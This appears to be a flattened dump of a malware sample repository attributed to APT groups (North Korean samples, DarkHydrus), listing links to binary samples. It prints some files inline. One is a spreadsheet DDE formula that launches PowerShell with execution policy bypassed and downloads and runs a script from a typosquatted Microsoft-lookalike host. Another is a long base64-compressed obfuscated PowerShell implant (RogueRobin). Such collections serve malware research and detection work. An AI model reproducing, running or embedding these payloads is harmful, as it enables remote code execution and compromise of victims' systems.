https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/HiddenCobraJoanap.bin -------------------------------------------------------------------------------- /DPRK/MoneroNorthKoreaPyongynag.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/MoneroNorthKoreaPyongynag.bin -------------------------------------------------------------------------------- /DPRK/North Korea NavRat June 2018/Application.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/North Korea NavRat June 2018/Application.bin -------------------------------------------------------------------------------- /DPRK/North Korea NavRat June 2018/DLL#1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/North Korea NavRat June 2018/DLL#1.bin -------------------------------------------------------------------------------- /DPRK/North Korea NavRat June 2018/DLL#2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/North Korea NavRat June 2018/DLL#2.bin -------------------------------------------------------------------------------- /DPRK/RedDawnSunTeamAndroid.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/RedDawnSunTeamAndroid.apk -------------------------------------------------------------------------------- /DPRK/SunTeamAndroid.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/SunTeamAndroid.apk -------------------------------------------------------------------------------- /DPRK/SunTeamRedDawn.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/SunTeamRedDawn.apk -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrus.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DarkHydrus/DarkHydrus.bin -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrusImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DarkHydrus/DarkHydrusImplant.bin -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrusInfo.txt: -------------------------------------------------------------------------------- 1 | https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/ -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrusPayload.bin: -------------------------------------------------------------------------------- 1 | http://micrrosoft.net/releasenotes.txt 2 | 3 | -------------------------------------------------------------------------------- /DarkHydrus/DarkHydrusPowershellScript.bin: -------------------------------------------------------------------------------- 1 | =cmd|' /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX ((New-Object Net.WebClient).DownloadString(\"http://micrrosoft.net/winupdate.ps1\"))'!A0 -------------------------------------------------------------------------------- /DarkHydrus/RogueRobinPowershellPayloadObfuscated.bin: -------------------------------------------------------------------------------- 1 | (nEw-oBJEcT io.coMPreSSIOn.DEfLatEStreAM([IO.mEMoRYsTrEAm][SysTEM.CoNVErt]::fROmbaSe64stRInG( "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